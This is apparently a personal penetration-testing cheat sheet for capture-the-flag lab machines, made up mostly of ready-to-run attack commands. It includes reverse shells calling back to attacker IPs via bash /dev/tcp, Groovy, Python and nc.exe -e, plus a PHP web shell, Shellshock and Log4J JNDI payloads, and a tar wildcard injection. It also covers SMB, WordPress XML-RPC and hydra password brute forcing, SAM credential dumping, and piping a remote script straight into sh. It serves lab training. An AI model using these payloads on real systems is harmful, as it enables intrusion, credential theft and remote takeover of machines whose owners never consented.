Table of contents
Open Table of contents
Recon
NMAP
# to get all ports
nmap -p- -T4 10.10.135.68 -v
sudo nmap -sS -p- -T4 10.10.240.251 -v
# scan deeper the open ports
nmap -p22,80 -sS -sC -sV 10.10.135.68 -v
ls /usr/share/nmap/scripts/ | grep smbDirb
dirb http://10.10.135.68/Gobuster
gobuster -w /usr/share/wordlists/dirb/big.txt dir -u http://seasurfer.thm/ Nikto
nikto -h 10.10.135.68Wfuzz
subdomains
wfuzz -c -f sub-fighter -w subd.txt -u 'http://cmess.thm' -H "Host: FUZZ.cmess.thm" --hw 290
wfuzz -c -f sub-fighter -w subdomains.lst -u 'http://nahamstore.thm' -H "Host: FUZZ.nahamstore.thm" --hw 65In Web Browser
- network
- cookies
- what requests are sent (using some proxy)
PHP Website
- if syntax higlighting is enabled then check
.phps
SMB, RDP
smbclient -L 10.10.150.121 -N
smbmap -H 10.10.240.251
smbmap -u 'lilyle' -p 'ChangeMe#1234' -H windcorp.thm # shares
smbmap -u 'lilyle' -p 'ChangeMe#1234' -H windcorp.thm -r # things inside shares
enum4linux -a 10.10.240.251
# brute force
crackmapexec smb 10.10.83.74 -u Jareth -p /usr/share/wordlists/rockyou.txt
# get access
evil-winrm -i 10.10.83.74 -u Jareth -p sarahSNMP
# Community String Brute Force
wget https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/SNMP/snmp-onesixtyone.txt
onesixtyone 10.10.83.74 -c snmp-onesixtyone.txt
# enum snmp
snmp-check -c openview 10.10.83.74
snmpwalkCMS
Joomla
http://10.10.114.248/joomla//administrator/manifests/files/joomla.xml says that the version is 3.9.12.
/README.txt
You can find an exploit in https://www.exploit-db.com/exploits/42033. There is a SQLI in following url: http://10.10.107.150/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml<SQLI>
Another exploit that can be found: https://github.com/stefanlucas/Exploit-Joomla
RCE is possible
sar2html
/_test has sar2html which is vulnerable to RCE. /index.php?plot=;<command>, then click select host.
https://www.exploit-db.com/exploits/47204
Wordpress
https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/wordpress
Users: http://internal.thm/blog/index.php/wp-json/wp/v2/users/
/index.php/comments/feed/ worth to check
XMLRPC
curl -X POST -d "<methodCall><methodName>wp.getUsersBlogs</methodName><params>
<param><value>admin</value></param><param><value>pass</value></param></params></methodCall>" http://internal.thm/blog/xmlrpc.phpBrute force XMLRPC
#!/bin/bash
while IFS= read -r pass; do
echo $pass
curl -X POST -d "<methodCall><methodName>wp.getUsersBlogs</methodName><params>
<param><value>admin</value></param><param><value>$pass</value></param></params></methodCall>" http://internal.thm/blog/xmlrpc.php
done < "/usr/share/wordlists/rockyou.txt"jenkins
/script for rce
Thread.start {
String host="10.8.97.245";
int port=1234;
String cmd="/bin/bash";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
}Exploitation
RCE and Reverse shell payloads
php
<?php system($_GET['cmd']);?>https://github.com/pentestmonkey/php-reverse-shell https://github.com/ivan-sincek/php-reverse-shell/blob/master/src/reverse/php_reverse_shell.php - PHP Reverse Shell https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php - PHP Reverse Shell
bash
/bin/bash -c 'bash -i >& /dev/tcp/10.8.97.245/4444 0>&1'msfvenom
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.8.97.245 LPORT=1234 -f aspx >reverse.aspxCommand Injection
https://book.hacktricks.xyz/pentesting-web/command-injection
/ping?ip=10.8.97.245 %0A ls
LFI
http://10.10.97.188/?view=php://filter/read=convert.base64-encode/resource=dog/../flag - converts into bas64. Useful when you cannot get php file.
SQLi
sqlmap
sqlmap -r aaa.req --dump-all --batchShellshock
curl -A "() { ignored; }; echo Content-Type: text/plain ; echo ; echo ; /usr/bin/id" http://10.10.135.68/cgi-bin/test.cgi
curl -A "() { ignored; }; echo Content-Type: text/plain ; echo ; echo ; /bin/bash -c 'exec /bin/bash -i >& /dev/tcp/10.8.97.245/1234 0>&1'" http://10.10.135.68/cgi-bin/test.cgi Log4J
- https://hackernoon.com/pentests-and-log4j-how-to-exploit-a-vulnerable-system
- https://github.com/kozmer/log4j-shell-poc To run the exploit:
- In one terminal:
nc -lvnp 9001- in another
git clone https://github.com/kozmer/log4j-shell-poc
cd log4j-shell-poc
vim poc.py
# change /bin/sh to cmd
# the machine is Windows
python3 poc.py --userip 10.10.14.92 --webport 8000 --lport 9001
# then paste ${jndi:ldap://10.10.14.92:1389/a} in input placePost Exploitation
Linux
NFS Share
# find available folders
showmount -e 10.10.240.128
# mount
mkdir /mnt/new_back
mount -t nfs 10.10.240.128:/home/nfs /mnt/new_back -o nolockLinux PrivEsc Checks
sudo-l
# suid
find / -perm -4000 2>/dev/null
find / -perm -u=s -type f 02>/dev/null
# crontab
cat /etc/crontab
# capabilities
getcap -r / 2>/dev/null
# files owned by
find / -user hakanbey 2>/dev/null
find /usr/bin -group hakanbey 2>/dev/null | more
# check network connections
ss -tulpn
# check prcesses
ps aux | grep root
# check some folders
ls /optLinpeas
https://github.com/peass-ng/PEASS-ng/blob/master/linPEAS/README.md
curl -L https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh | sh
Docker
r00t@ultratech-prod:~$ groups
r00t dockerhttps://gtfobins.github.io/gtfobins/docker/
docker run -v /:/mnt --rm -it bash chroot /mnt sh
# whoami
rootif no bash images then docker images and choose one.
Tar and Wildcard
if some * in some backup.sh that runs periodically, then checkpoints
https://www.gnu.org/software/tar/manual/html_section/checkpoints.html
# for example in file this command
tar -zcf /home/kyle/backups/invoices.tgz *then create a shell and a checkpoint
echo $'/usr/bin/python3 -c \'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.8.35.156\",1337));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(\"/bin/sh\")\'' > shell.sh
echo "" > "--checkpoint-action=exec=sh shell.sh"
echo "" > --checkpoint=1Windows
Better Runas - RunasCs
# for reverse shell
C:\> RunasCs.exe <user> <pass> cmd.exe -r 10.10.14.92:1234System and Sam creds dump
impacket-secretsdump -ts local -system system.bak -sam sam.bakPotato Attack
https://github.com/ohpe/juicy-potato/releases
JuicyPotato.exe -l 1337 -c "{F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4}" -p c:\windows\system32\cmd.exe -a "/c c:\users\public\nc.exe -e cmd.exe 10.8.97.245 4444" -t *https://github.com/itm4n/PrintSpoofer
PrintSpoofer64.exe -c "c:\inetpub\wwwroot\nt4wrksv\nc.exe -e cmd.exe 10.8.97.245 4444"HHUPD.EXE
https://sotharo-meas.medium.com/cve-2019-1388-windows-privilege-escalation-through-uac-22693fa23f5f
Brute Force and Password Cracking
john
john hash --wordlist=/usr/share/wordlists/rockyou.txtFFUF
ffuf -u http://10.10.142.177/api/login -X POST -w userlist.txt:W1,md5_passwords.txt:W2 -H "Content-Type: application/json" -d '{"username":"W1","password":"W2"}' -v -o resultHyrda
hydra -P /usr/share/wordlists/rockyou.txt -l admin blitz.icsd http-get-form "/:j_username=^USER^&j_password=^PASS^&from=&Submit=:Invalid username or password"Sucrack
https://github.com/hemp3l/sucrack
cd sucrack
./configure
make
src/sucrack -u hakanbey -w 100 wordlist.txtOthers
Shell Stabilization
Unix
python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
# ctrl+z
stty raw -echo; fgWindows
msfconsole
# then
use exploit/windows/misc/hta_server
set lhost <ip>
run
# then in windows
mshta http://10.10.14.92:8080/2ao4a48kDfJgdCl.htaSSH Port Forwarding
on remote host service is on 8080 and it forwarded to local to work on 8080
ssh -L 8080:172.17.0.2:8080 [email protected] -NSocat Port Forwarding
service works on 22 on localhost and you forward it to 2222
socat TCP-LISTEN:2222,fork TCP:127.0.0.1:22RDP Connect
xfreerdp /u:Wade /v:10.10.15.65 /p:parzival /dynamic-resolutionDecode Encode
Stenography
Steghide
steghide extract -sf somefile.pngReverse engineering
strings somebinary
ltrace somebinary Buffer Overflow
- An example here [[Anonymous Playground]]
objdump -d -Mintel hacktheworld
echo -n aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa > input
echo -n 580640000000 | xxd -r -p >> input
gdb hacktheworld
(gdb) run < input